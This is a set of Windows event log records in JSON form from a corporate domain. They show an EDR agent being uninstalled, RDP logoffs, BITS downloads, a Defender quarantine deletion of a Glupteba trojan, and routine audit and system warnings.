{"EventTime":"2021-09-29T13:34:06.102103+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-FilterManager","ProviderGuid":"{F3C5E28E-63F6-49C7-A204-E48A1BC4B09D}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":82730,"ExecutionProcessID":4,"ExecutionThreadID":5348,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File System Filter 'edrdrv' (Version 10.0, ???2020???-???11???-???06T04:46:51.000000000Z) unloaded successfully.","Opcode":"Info","FinalStatus":"0x0","DeviceVersionMajor":"10","DeviceVersionMinor":"0","DeviceNameLength":"6","DeviceName":"edrdrv","DeviceTime":"2020-11-06T04:46:51.0000000Z","EventReceivedTime":"2021-09-29T13:34:52.566180+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T13:34:29.746942+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1034,"SourceName":"MsiInstaller","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69839,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Windows Installer removed the product. Product Name: EDR Agent v2. Product Version: 2.0.0.0. Product Language: 1033. Manufacturer: OpenEdr. Removal success or error status: 0.","Opcode":"Info","Data":"EDR Agent v2","Data_1":"2.0.0.0","Data_2":"1033","Data_3":"0","Data_4":"OpenEdr","Data_5":"(NULL)","EventData.Binary":"7B34354343353536432D413033422D343246462D413246452D3030303030303030303030307D3030303039323065343765663532383433393263373132393635616534306161626430633030303030393034","EventReceivedTime":"2021-09-29T13:34:52.764301+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T13:34:29.746942+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11724,"SourceName":"MsiInstaller","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69838,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Product: EDR Agent v2 -- Removal completed successfully.","Opcode":"Info","Data":"Product: EDR Agent v2 -- Removal completed successfully.","Data_1":"(NULL)","Data_2":"(NULL)","Data_3":"(NULL)","Data_4":"(NULL)","Data_5":"(NULL)","EventData.Binary":"7B34354343353536432D413033422D343246462D413246452D3030303030303030303030307D","EventReceivedTime":"2021-09-29T13:34:52.758745+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T14:19:43.614355+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6000,"SourceName":"Microsoft-Windows-Winlogon","ProviderGuid":"{DBE9B383-7CF3-4331-91CC-A3CB16A3B538}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69847,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The winlogon notification subscriber <WSearch> was unavailable to handle a notification event.","Data":"WSearch","EventData.Binary":"D9060000","EventReceivedTime":"2021-09-29T14:19:44.480845+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T14:19:43.618807+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":23,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":3975,"ActivityID":"{F420310A-949A-4CA3-9D0B-B777C69E0000}","ExecutionProcessID":1020,"ExecutionThreadID":6768,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Remote Desktop Services: Session logoff succeeded:\r\n\r\nUser: CORP\\Leo\r\nSession ID: 7","Opcode":"Info","EventXML.User":"CORP\\Leo","EventXML.SessionID":"7","EventReceivedTime":"2021-09-29T14:19:44.598869+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T14:19:44.338717+05:45","Hostname":"IT02.corp.local","Keywords":"2305878193585782784","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7002,"SourceName":"Microsoft-Windows-Winlogon","ProviderGuid":"{DBE9B383-7CF3-4331-91CC-A3CB16A3B538}","Version":0,"TaskValue":1102,"OpcodeValue":0,"RecordNumber":82738,"ExecutionProcessID":8384,"ExecutionThreadID":4268,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"User Logoff Notification for Customer Experience Improvement Program","Opcode":"Info","TSId":"7","UserSid":"S-1-5-21-2569713578-3403938347-3732993993-1139","EventReceivedTime":"2021-09-29T14:19:45.678518+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T14:19:45.729455+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":24,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":3977,"ActivityID":"{F420310A-949A-4CA3-9D0B-B777C69E0000}","ExecutionProcessID":1020,"ExecutionThreadID":9480,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Remote Desktop Services: Session has been disconnected:\r\n\r\nUser: CORP\\Leo\r\nSession ID: 7\r\nSource Network Address: 172.16.20.11","Opcode":"Info","EventXML.User":"CORP\\Leo","EventXML.SessionID":"7","EventXML.Address":"172.16.20.11","EventReceivedTime":"2021-09-29T14:19:46.787389+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:39:52.374326+05:45","Hostname":"IT03.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28032,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28180,"OpcodeValue":0,"RecordNumber":7591,"ExecutionProcessID":4488,"ExecutionThreadID":6272,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"IT03","AccountName":"Administrator","UserID":"S-1-5-21-3281079745-558096271-899791025-500","AccountType":"User","Message":"AppResolver has parsed the visual elements manifest for a tile.","Opcode":"Info","Filename":"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml","SchemaType":"2","ErrorCode":"0","Failure reason":"NULL","EventReceivedTime":"2021-09-29T19:39:54.330464+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:39:52.439542+05:45","Hostname":"IT03.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28018,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28177,"OpcodeValue":2,"RecordNumber":7593,"ExecutionProcessID":4488,"ExecutionThreadID":6272,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"IT03","AccountName":"Administrator","UserID":"S-1-5-21-3281079745-558096271-899791025-500","AccountType":"User","Message":"AppResolver Scan Stopped.","Opcode":"Stop","EventData":"","EventReceivedTime":"2021-09-29T19:39:54.330464+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:39:52.381765+05:45","Hostname":"IT03.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28117,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28143,"OpcodeValue":0,"RecordNumber":7592,"ExecutionProcessID":4488,"ExecutionThreadID":6272,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"IT03","AccountName":"Administrator","UserID":"S-1-5-21-3281079745-558096271-899791025-500","AccountType":"User","Message":"Shortcut for application Google Chrome with ID Chrome and flags 0x31 is updated in app resolver cache.","Opcode":"Info","Name":"Google Chrome","AppID":"Chrome","Flags":"49","EventReceivedTime":"2021-09-29T19:39:54.330464+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:39:52.445153+05:45","Hostname":"IT03.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28019,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28179,"OpcodeValue":0,"RecordNumber":7594,"ExecutionProcessID":4488,"ExecutionThreadID":6272,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"IT03","AccountName":"Administrator","UserID":"S-1-5-21-3281079745-558096271-899791025-500","AccountType":"User","Message":"AppResolver Cache Committed.","Opcode":"Info","EventData":"","EventReceivedTime":"2021-09-29T19:39:54.330464+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:39:52.349673+05:45","Hostname":"IT03.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28017,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28177,"OpcodeValue":1,"RecordNumber":7590,"ExecutionProcessID":4488,"ExecutionThreadID":6272,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"IT03","AccountName":"Administrator","UserID":"S-1-5-21-3281079745-558096271-899791025-500","AccountType":"User","Message":"AppResolver Scan Started.","Opcode":"Start","EventData":"","EventReceivedTime":"2021-09-29T19:39:54.330464+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:56:39.002949+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":16403,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4543,"ExecutionProcessID":356,"ExecutionThreadID":2184,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Opcode":"Info","User":"NT AUTHORITY\\LOCAL SERVICE","jobTitle":"Font Download","jobId":"{9e6fe86d-ae14-40b9-b53f-2ea6270dd430}","jobOwner":"NT AUTHORITY\\LOCAL SERVICE","fileCount":"1","RemoteName":"https://fs.microsoft.com/fs/windows/config.json","LocalName":"\\\\?\\C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\Fonts\\Download-2.tmp","processId":"1096","ClientProcessStartKey":"5066549580791831","EventReceivedTime":"2021-09-29T19:56:40.667603+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:56:38.973152+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":3,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4541,"ExecutionProcessID":356,"ExecutionThreadID":2184,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The BITS service created a new job.\r\nTransfer job: Font Download\r\nJob ID: {9e6fe86d-ae14-40b9-b53f-2ea6270dd430}\r\nOwner: NT AUTHORITY\\LOCAL SERVICE\r\nProcess Path: C:\\Windows\\System32\\svchost.exe\r\nProcess ID: 1096","Opcode":"Info","jobTitle":"Font Download","jobId":"{9e6fe86d-ae14-40b9-b53f-2ea6270dd430}","jobOwner":"NT AUTHORITY\\LOCAL SERVICE","processPath":"C:\\Windows\\System32\\svchost.exe","processId":"1096","ClientProcessStartKey":"5066549580791831","EventReceivedTime":"2021-09-29T19:56:40.667603+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:56:38.986045+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":209,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4542,"ExecutionProcessID":356,"ExecutionThreadID":2184,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"High performance property for BITS job \"Font Download\" with ID \"{9e6fe86d-ae14-40b9-b53f-2ea6270dd430}\" Enabled.","Opcode":"Info","jobName":"Font Download","jobId":"{9e6fe86d-ae14-40b9-b53f-2ea6270dd430}","isRoaming":"1","EventReceivedTime":"2021-09-29T19:56:40.667603+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:56:40.082598+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":1,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4549,"ExecutionProcessID":356,"ExecutionThreadID":6204,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The transfer job is complete.\r\nUser: NT AUTHORITY\\LOCAL SERVICE\r\nTransfer job: Font Download\r\nJob ID: {9e6fe86d-ae14-40b9-b53f-2ea6270dd430}\r\nOwner: NT AUTHORITY\\LOCAL SERVICE\r\nFile count: 1","Opcode":"Info","User":"NT AUTHORITY\\LOCAL SERVICE","jobTitle":"Font Download","jobId":"{9e6fe86d-ae14-40b9-b53f-2ea6270dd430}","jobOwner":"NT AUTHORITY\\LOCAL SERVICE","fileCount":"1","bytesTransferred":"55","bytesTransferredFromPeer":"0","EventReceivedTime":"2021-09-29T19:56:41.693707+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:56:40.079033+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":60,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":1,"TaskValue":0,"OpcodeValue":2,"RecordNumber":4548,"ActivityID":"{287A2D3F-ED28-4936-8AED-CB90825D7094}","ExecutionProcessID":356,"ExecutionThreadID":6204,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"BITS stopped transferring the Font Download transfer job that is associated with the https://fs.microsoft.com/fs/windows/config.json URL. The status code is 0x0.","Opcode":"Stop","transferId":"{287a2d3f-ed28-4936-8aed-cb90825d7094}","name":"Font Download","Id":"{9e6fe86d-ae14-40b9-b53f-2ea6270dd430}","url":"https://fs.microsoft.com/fs/windows/config.json","hr":"0","fileTime":"2017-04-20T16:11:08.000000000Z","fileLength":"55","bytesTotal":"55","bytesTransferred":"55","peerProtocolFlags":"0","bytesTransferredFromPeer":"0","AdditionalInfoHr":"0","PeerContextInfo":"0","bandwidthLimit":"18446744073709551615","ignoreBandwidthLimitsOnLan":"false","EventReceivedTime":"2021-09-29T19:56:41.678140+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:56:39.764775+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":310,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4544,"ExecutionProcessID":356,"ExecutionThreadID":6556,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The initialization of the peer helper modules failed with the following error:  0x80070032.","Opcode":"Info","ErrorCode":"2147942450","EventReceivedTime":"2021-09-29T19:56:41.678140+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:56:39.798725+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":59,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":1,"TaskValue":0,"OpcodeValue":1,"RecordNumber":4545,"ActivityID":"{0ACF5730-9A3E-44CA-92E1-D98D4F91E0B0}","ExecutionProcessID":356,"ExecutionThreadID":6556,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"BITS started the Font Download transfer job that is associated with the https://fs.microsoft.com/fs/windows/config.json URL.","Opcode":"Start","transferId":"{0acf5730-9a3e-44ca-92e1-d98d4f91e0b0}","name":"Font Download","Id":"{9e6fe86d-ae14-40b9-b53f-2ea6270dd430}","url":"https://fs.microsoft.com/fs/windows/config.json","fileTime":"2017-04-20T16:10:39.000000000Z","fileLength":"55","bytesTotal":"55","bytesTransferred":"0","bytesTransferredFromPeer":"0","EventReceivedTime":"2021-09-29T19:56:41.678140+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-28T12:39:46.082041+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1011,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22597,"ExecutionProcessID":2080,"ExecutionThreadID":6768,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus has deleted an item from quarantine.\r\n For more information please see the following:\r\nhttps://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Glupteba!ml&threatid=2147748182&enterprise=0\r\n \tName: Trojan:Win32/Glupteba!ml\r\n \tID: 2147748182\r\n \tSeverity: Severe\r\n \tCategory: Trojan\r\n \tUser: NT AUTHORITY\\SYSTEM\r\n \tSecurity intelligence Version: AV: 1.349.1543.0, AS: 1.349.1543.0\r\n \tEngine Version: 1.1.18500.10","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","User":"SYSTEM","SID":"S-1-5-18","Threat Name":"Trojan:Win32/Glupteba!ml","Threat ID":"2147748182","Severity ID":"5","Category ID":"8","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Glupteba!ml&threatid=2147748182&enterprise=0","Path":"file:_C:\\Windows\\b6a1458f396.exe","Severity Name":"Severe","Category Name":"Trojan","Security intelligence Version":"AV: 1.349.1543.0, AS: 1.349.1543.0","Engine Version":"1.1.18500.10","EventReceivedTime":"2021-09-28T12:39:48.364135+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T04:56:09.733600+05:45","Hostname":"IT03.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5058,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12292,"OpcodeValue":0,"RecordNumber":40726202,"ExecutionProcessID":632,"ExecutionThreadID":3968,"Channel":"Security","Message":"Key file operation.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT03$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t4680\r\n\tProcess Creation Time:\t???2021???-???09???-???28T23:11:05.970699700Z\r\n\r\nCryptographic Parameters:\r\n\tProvider Name:\tMicrosoft Software Key Storage Provider\r\n\tAlgorithm Name:\tUNKNOWN\r\n\tKey Name:\t77640e54-d204-59d7-5059-5212bd67638e\r\n\tKey Type:\tUser key.\r\n\r\nKey File Operation Information:\r\n\tFile Path:\tC:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\7227327156fd8daa02999ffff5255449_0e823fd5-892f-4ff6-826b-8eb2e5230ee2\r\n\tOperation:\tRead persisted key from file.\r\n\tReturn Code:\t0x0","Category":"Other System Events","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT03$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ClientProcessId":"4680","ClientCreationTime":"2021-09-28T23:11:05.970699700Z","ProviderName":"Microsoft Software Key Storage Provider","AlgorithmName":"UNKNOWN","KeyName":"77640e54-d204-59d7-5059-5212bd67638e","KeyType":"%%2500","KeyFilePath":"C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\7227327156fd8daa02999ffff5255449_0e823fd5-892f-4ff6-826b-8eb2e5230ee2","Operation":"%%2458","ReturnCode":"0x0","EventReceivedTime":"2021-09-29T04:56:11.120786+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T04:56:09.734313+05:45","Hostname":"IT03.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5061,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12290,"OpcodeValue":0,"RecordNumber":40726203,"ExecutionProcessID":632,"ExecutionThreadID":3968,"Channel":"Security","Message":"Cryptographic operation.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT03$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nCryptographic Parameters:\r\n\tProvider Name:\tMicrosoft Software Key Storage Provider\r\n\tAlgorithm Name:\tRSA\r\n\tKey Name:\t77640e54-d204-59d7-5059-5212bd67638e\r\n\tKey Type:\tUser key.\r\n\r\nCryptographic Operation:\r\n\tOperation:\tOpen Key.\r\n\tReturn Code:\t0x0","Category":"System Integrity","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT03$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ProviderName":"Microsoft Software Key Storage Provider","AlgorithmName":"RSA","KeyName":"77640e54-d204-59d7-5059-5212bd67638e","KeyType":"%%2500","Operation":"%%2480","ReturnCode":"0x0","EventReceivedTime":"2021-09-29T04:56:11.120786+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-28T00:17:16.165045+05:45","Hostname":"IT01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1056,"SourceName":"Microsoft-Windows-TerminalServices-RemoteConnectionManager","ProviderGuid":"{C76BAA63-AE81-421C-B425-340B4B24157F}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":26000,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"A new self signed certificate to be used for RD Session Host Server authentication on SSL connections was generated. The name on this certificate is IT01.corp.local. The SHA1 hash of the certificate is in the event data.","Data":"IT01.corp.local","EventData.Binary":"ED0DB314DA35E6A0A82B0A865DF89748FB6FEF70","EventReceivedTime":"2021-09-28T00:17:16.654653+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-28T00:17:16.258437+05:45","Hostname":"IT01.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":263,"SourceName":"Microsoft-Windows-TerminalServices-RemoteConnectionManager","ProviderGuid":"{C76BAA63-AE81-421C-B425-340B4B24157F}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":763,"ActivityID":"{F462FD51-0736-4F16-93A4-C0F9BFE30000}","ExecutionProcessID":1016,"ExecutionThreadID":4152,"Channel":"Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"WDDM graphics mode is enabled","Opcode":"Info","EventReceivedTime":"2021-09-28T00:17:17.663858+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-25T08:09:33.743396+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"4611686018695823360","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":1014,"SourceName":"Microsoft-Windows-DNS-Client","ProviderGuid":"{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}","Version":0,"TaskValue":1014,"OpcodeValue":0,"RecordNumber":56369,"ExecutionProcessID":1348,"ExecutionThreadID":1844,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Name resolution for the name wpad timed out after none of the configured DNS servers responded.","Opcode":"Info","QueryName":"wpad","AddressLength":"128","Address":"02000000C0A804CB000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000","EventReceivedTime":"2021-09-25T08:09:34.773388+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-25T02:32:56.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":6038,"SourceName":"LsaSrv","ProviderGuid":"{199FE037-2B82-40A9-82AC-E1D46C792B99}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":647449,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"Microsoft Windows Server has detected that NTLM authentication is presently being used between clients and this server. This event occurs once per boot of the server on the first time a client uses NTLM with this server.\r\n \r\nNTLM is a weaker authentication mechanism. Please check:\r\n \r\n      Which applications are using NTLM authentication?\r\n      Are there configuration issues preventing the use of stronger authentication such as Kerberos authentication?\r\n      If NTLM must be supported, is Extended Protection configured?\r\n \r\nDetails on how to complete these checks can be found at http://go.microsoft.com/fwlink/?LinkId=225699.","Opcode":"Info","EventData":"","EventReceivedTime":"2021-09-25T02:32:57.033934+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T09:41:19.484925+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":50,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56285,"ExecutionProcessID":1212,"ExecutionThreadID":1356,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service detected a time difference of greater than 5000 milliseconds for 900 seconds. The time difference might be caused by synchronization with low-accuracy time sources or by suboptimal network conditions. The time service is no longer synchronized and cannot provide the time to other clients or update the system clock. When a valid time stamp is received from a time service provider, the time service will correct itself.","Opcode":"Info","EventData.Name":"TMP_EVENT_LOCALCLOCK_UNSET","TimeDifferenceMilliseconds":"5000","TimeSampleSeconds":"900","EventReceivedTime":"2021-09-23T09:41:20.640680+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-23T12:24:40.381081+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":9027,"SourceName":"Desktop Window Manager","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69268,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The Desktop Window Manager has registered the session port.","EventReceivedTime":"2021-09-23T12:24:41.036926+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
